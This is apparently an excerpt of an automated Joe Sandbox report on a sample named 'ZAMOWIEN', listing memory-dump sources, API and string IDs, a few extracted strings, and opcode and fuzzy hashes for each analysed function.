                                                                                  • Instruction ID: c07e2721446672de48ef949af3b3fd1724f4697d775768238195a6494a136d88
                                                                                  • Opcode Fuzzy Hash: efe8cef68db28fc87a60efe72a46d7c07c209dff040b0ca35501a562a3f42aec
                                                                                  • Instruction Fuzzy Hash: 7E328FB6E11219DBDB14CFA8C890BAEBBB1FF44754F14006DE809AB351D73AA911CB91
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: a101e4c8cc1cd3a28419e7c05373b2384c578f42935e2fc2ba21bc9794225af5
                                                                                  • Instruction ID: 528bdb8a20a0b817120d5ce902745c0ce42ca35263bae68a83809cba2065ea5b
                                                                                  • Opcode Fuzzy Hash: a101e4c8cc1cd3a28419e7c05373b2384c578f42935e2fc2ba21bc9794225af5
                                                                                  • Instruction Fuzzy Hash: E9B120B5609380CFD354CF28C890A5ABBF1BB89314F54496EE8998B352D774E946CB82
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 074fd48e7193438da3427d373021df9b6ba9faa99f6625d5fed2495fb0375642
                                                                                  • Instruction ID: dd18ffad8f8b542ea8bb28b2b4a5cb178e99ea6e37e5c6d7c992a4b8a36d6c62
                                                                                  • Opcode Fuzzy Hash: 074fd48e7193438da3427d373021df9b6ba9faa99f6625d5fed2495fb0375642
                                                                                  • Instruction Fuzzy Hash: 63814F75A00309BBDB21DFA5CC85EAFBBF9EF48760F100629E515AB190DB74EA00CB51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6ac6f6622cc3acd7d566d53eb27b020620acaa0e38dca4530d225a7265709bc7
                                                                                  • Instruction ID: 780ce0aeb4e8d402f3bf2fdbe4153299ada214e48b5bc51edcd871333903a48f
                                                                                  • Opcode Fuzzy Hash: 6ac6f6622cc3acd7d566d53eb27b020620acaa0e38dca4530d225a7265709bc7
                                                                                  • Instruction Fuzzy Hash: 32617275A01606EFDB08CF78C490BADFBB5BF48354F24866ED419A7300DB34A9518F96
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: 231ce881204d209f8db957bd1477331bea28a889c478ffdfbf21c571c64412ed
                                                                                  • Instruction ID: 3b0148e388d365b9ffd5c949054a95e6a608b639ff95da6d14e109858585e2cd
                                                                                  • Opcode Fuzzy Hash: 231ce881204d209f8db957bd1477331bea28a889c478ffdfbf21c571c64412ed
                                                                                  • Instruction Fuzzy Hash: 153130725842049FC711CF24C8A0A6A77A9EF84364F10826DED099F291CB31ED4ACFE1
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: 8cf89a7f3ef940ded8782e647a92a6e50bf0d219f755f537ad1e14c90b021ffa
                                                                                  • Instruction ID: 4b6d5144491d72997a03af0f95699d9059682c3cc16d48b2160272154b5504c9
                                                                                  • Opcode Fuzzy Hash: 8cf89a7f3ef940ded8782e647a92a6e50bf0d219f755f537ad1e14c90b021ffa
                                                                                  • Instruction Fuzzy Hash: 3D31CF35722A05FFE7419B24CAA0B59BBA6FF88254F506055E8008BF52CB35E831CF82
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: bdbbb022737ecb0a0f07257a621a6708b5056068a0d5c9669e489d94c8836b46
                                                                                  • Instruction ID: 258714fdf8d184a51fd71905798be7ccb52c678c82a963108b4a2f3262cd1377
                                                                                  • Opcode Fuzzy Hash: bdbbb022737ecb0a0f07257a621a6708b5056068a0d5c9669e489d94c8836b46
                                                                                  • Instruction Fuzzy Hash: 72210435112641EFD721DF66CAA4B1ABBA5FFC8B60F411859E8425B640C674E848CBA3
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: e6d20a8c0750dc1f9a25d93e4b42c3bc0a8c40cbbc97883cd8adf7c8bd118a08
                                                                                  • Instruction ID: 52171b75dde99365ae5d6a85b38ea8500836dd74d2302849464d0c26c6b0fbc7
                                                                                  • Opcode Fuzzy Hash: e6d20a8c0750dc1f9a25d93e4b42c3bc0a8c40cbbc97883cd8adf7c8bd118a08
                                                                                  • Instruction Fuzzy Hash: D6F0FA32200740AFD731CB19CC09F8ABBEDEF84B10F040518E58693590C6A8F909CA64
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b771cb614481c8dfb19d672d4e5c272fd32e3d5d3782ae2de8fb07db9b81b207
                                                                                  • Instruction ID: d07cfea911be296fa4449d610464cb4d962080db9c2aaa697c7e798c070f8f59
                                                                                  • Opcode Fuzzy Hash: b771cb614481c8dfb19d672d4e5c272fd32e3d5d3782ae2de8fb07db9b81b207
                                                                                  • Instruction Fuzzy Hash: 55E06572714204EFEF04DB58D856B8A73EDEB897ACF140199F50AD7140D664DD01DA90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603177160.00000000373D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_373d0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: z
                                                                                  • API String ID: 0-1657960367
                                                                                  • Opcode ID: 2c03287628fbc214cc51931866724c850e7833ceb53986839624c9152f47c449
                                                                                  • Instruction ID: f5572ecdf944cdfcfe68002654db97c9903c83d23adefccd382d02f3705f839b
                                                                                  • Opcode Fuzzy Hash: 2c03287628fbc214cc51931866724c850e7833ceb53986839624c9152f47c449
                                                                                  • Instruction Fuzzy Hash: 2891C37120CB948FD7A4DF28C494B6ABBE6BB9C344F54496DA1DEC3361DA34D885CB02
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                  • Instruction ID: 83abe562aa136820cc5326569938de89452d872753e20a258189fa50efd6496d
                                                                                  • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                  • Instruction Fuzzy Hash: 55618BB5D11319EBEB11CFA5C850BEEBBB5FF84764F104159E810BB250DB749A01CBA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                  • Instruction ID: 49523e0d41b905e4ef1000ae850e5e29e583ed9a1f19110ab9db1ba2d2f3bfec
                                                                                  • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                  • Instruction Fuzzy Hash: 5251ACB2605305EFE3118F14C844F6BB7E9FB84764F40092DF6809B290DBB5EA05CB92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: verifier.dll
                                                                                  • API String ID: 0-3265496382
                                                                                  • Opcode ID: b4843ca02e28feba75807addc3af252531ea0999a14a5f1e6b27f5a8636ffb10
                                                                                  • Instruction ID: 45b1149b9b392a49eb00a725396ef0ea25be8652714360672bd06ccb347a0d12
                                                                                  • Opcode Fuzzy Hash: b4843ca02e28feba75807addc3af252531ea0999a14a5f1e6b27f5a8636ffb10
                                                                                  • Instruction Fuzzy Hash: 2431CAB5700302AFEB148F69D861B2677E6EB88770FA0846AE508DF381E7759D81CB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #
                                                                                  • API String ID: 0-1885708031
                                                                                  • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                  • Instruction ID: 36cc035cdfc11f58f6fdba366b735d4b23239223984edf674e51e1bc871b38f7
                                                                                  • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                  • Instruction Fuzzy Hash: D341AD75A0061A9BDF15CF88C890BFEBBB5FF84755F00445EE845AB640DB34A941CBE1
                                                                                  Strings
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 376CFFF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                                                  • API String ID: 0-996340685
                                                                                  • Opcode ID: 1c17026281f4b02c958bdac7a21785fabbd120849196ab41177937ce8b123386
                                                                                  • Instruction ID: f900d6ebdfde940400a6778626d02ff4a801fc43eb44e58afdcf2d1df124b9b7
                                                                                  • Opcode Fuzzy Hash: 1c17026281f4b02c958bdac7a21785fabbd120849196ab41177937ce8b123386
                                                                                  • Instruction Fuzzy Hash: 32416C75A10B4AEED724DFB4C4506EAB7F8EF49310F00482ED5AAD7240E734A644CBA6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Flst
                                                                                  • API String ID: 0-2374792617
                                                                                  • Opcode ID: 935e9da471f9cf7a19e14adb3400501fe82cea809a63ca8057bc9b3a3734d467
                                                                                  • Instruction ID: d7cfd24657c5e5853bbf72a8e0f80f4f7784e273bafb0e8ee85a23c7846e9e62
                                                                                  • Opcode Fuzzy Hash: 935e9da471f9cf7a19e14adb3400501fe82cea809a63ca8057bc9b3a3734d467
                                                                                  • Instruction Fuzzy Hash: E341B8B5605301DFD304CF18C984A26BBE5FB8A724F51896EE459DF281DB71D882CB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8d1e6ab184b9e48e84ece52fbf48c97eb0bc4932f21595bef628b46286be4015
                                                                                  • Instruction ID: 92d01ab6921efcb8e64254df45cd24f1a9636f4c4a104281bea596e3f438d977
                                                                                  • Opcode Fuzzy Hash: 8d1e6ab184b9e48e84ece52fbf48c97eb0bc4932f21595bef628b46286be4015
                                                                                  • Instruction Fuzzy Hash: 66427D75A006168FDB08CF59C9906AEB7B2FF89364F14856DD661AF340DB34E842DBE0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 86a0b17d59c40bc6c80560d279917c5a2d457b99ec60f6bd71f9db3225842b0f
                                                                                  • Instruction ID: aa1e454ee176850aecbeecfc18d5a018aef98e444d573a9274772ecfbcb66ca7
                                                                                  • Opcode Fuzzy Hash: 86a0b17d59c40bc6c80560d279917c5a2d457b99ec60f6bd71f9db3225842b0f
                                                                                  • Instruction Fuzzy Hash: 7322A074B012168FDB09CF58D490AEAB7B2BF8A364F148979D851DF384DB34E951CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0539cebb351f193b7fa19bf3797263add7bf616f7266b28fb875ac49fce85e0d
                                                                                  • Instruction ID: 573c51eb6017a73c9d8696e9e46e6bf87cbe6663868309320ccb4996c7892e2d
                                                                                  • Opcode Fuzzy Hash: 0539cebb351f193b7fa19bf3797263add7bf616f7266b28fb875ac49fce85e0d
                                                                                  • Instruction Fuzzy Hash: 55C1E575E11206DBEB24CF59C850BADB7B2AF48324F548669E814BF282D735E941CBC1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f9ba58cf7a724ee45d1c0189c7c8d463b0cdaf87ba641253eb9f6dcb597e84e
                                                                                  • Instruction ID: c707e20248f215e73a7d206af2de2008a01c88b468ca86be06d476c91f3070ad
                                                                                  • Opcode Fuzzy Hash: 6f9ba58cf7a724ee45d1c0189c7c8d463b0cdaf87ba641253eb9f6dcb597e84e
                                                                                  • Instruction Fuzzy Hash: 46D113B5A012059FDB51CF68C990B9A7BEABF48350F0444BAED099F216DB35E905CFA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 82ba5b9f8610eb304a18b85e88e5207c24ca6e5808f40511664fe3833c6a2461
                                                                                  • Instruction ID: 348c5941a0b91f790f213f6e5785e73324d71917b183d02805bd40e8c865fd4e
                                                                                  • Opcode Fuzzy Hash: 82ba5b9f8610eb304a18b85e88e5207c24ca6e5808f40511664fe3833c6a2461
                                                                                  • Instruction Fuzzy Hash: AEB18474A003049FDB14CF54C984AEBB7BAEF84364F90445DE9469F690DB35F906CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ab61d7f11b462f098472027fd0802997c822a200212bc1c03e7b7e6a0980ccc9
                                                                                  • Instruction ID: 7b3e6cfa1653fb68d9a3be3220bf58b85eb189e984d9079c1e6c6bd1ddb4bc36
                                                                                  • Opcode Fuzzy Hash: ab61d7f11b462f098472027fd0802997c822a200212bc1c03e7b7e6a0980ccc9
                                                                                  • Instruction Fuzzy Hash: 2AC128B5A02221CFEB54CF28C6A0BB973BDFF68790F554099D841AF682D7349A41CB71
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 685cc066ec237ebcd1e6fdf3ac0d538d0c419e31fac18048a5fa68be47bb82cd
                                                                                  • Instruction ID: 3227fb56fef2016280a77091497a70c1085dcd37206c7a064fd0a44768cf9307
                                                                                  • Opcode Fuzzy Hash: 685cc066ec237ebcd1e6fdf3ac0d538d0c419e31fac18048a5fa68be47bb82cd
                                                                                  • Instruction Fuzzy Hash: 54C144B1900609DFDB15CFA9C9A0BAEBBF5FB88754F10446AE416AB350EB34A901CB54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bdd1af81a06cd854c5473e69bb0036fb4df4085db56f9c71a789186e2f8639ef
                                                                                  • Instruction ID: 7cee60cab60f03e1c5cac94e94d7147bcb6838f02890d802d31413ef6d203441
                                                                                  • Opcode Fuzzy Hash: bdd1af81a06cd854c5473e69bb0036fb4df4085db56f9c71a789186e2f8639ef
                                                                                  • Instruction Fuzzy Hash: 3E91A071D00215AFDB15CFA4DC94BAEBBB6EF48760F104559E510EF340DB39E9109BA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fea94397a4747a3b39b67319777f7597bd16e9a34112123e6e94a67743d5b9e4
                                                                                  • Instruction ID: b875be0df35c77afed589836b6a24d856d16c88fbc79556cb9eb809de313637a
                                                                                  • Opcode Fuzzy Hash: fea94397a4747a3b39b67319777f7597bd16e9a34112123e6e94a67743d5b9e4
                                                                                  • Instruction Fuzzy Hash: 85A17775600645DFDB14CF19C498A2AF7F6FF88364F24896AD15A8FA61E730E981CF80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 489bc6d8eff6424d4d4b2244aea4e1894c0ad067d0d3635d9d8b1a5282b314ba
                                                                                  • Instruction ID: 5e82fd8bcb61a8add8fc76ecefd2980480a054e741e70c80f14ebf078b190d3b
                                                                                  • Opcode Fuzzy Hash: 489bc6d8eff6424d4d4b2244aea4e1894c0ad067d0d3635d9d8b1a5282b314ba
                                                                                  • Instruction Fuzzy Hash: EEB190B8A10306CFEB14CF28C464BA977B4FF09368F54456AD825EB292DB34D946CF91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ca1ec49517622a58297d55684b0cb4c60bc2b8cb81c660abcca076ca459b74d4
                                                                                  • Instruction ID: 64f68af1bdb99d148f293c8b2832a813da9fbcb4af29b22f5881cebeb640f8c4
                                                                                  • Opcode Fuzzy Hash: ca1ec49517622a58297d55684b0cb4c60bc2b8cb81c660abcca076ca459b74d4
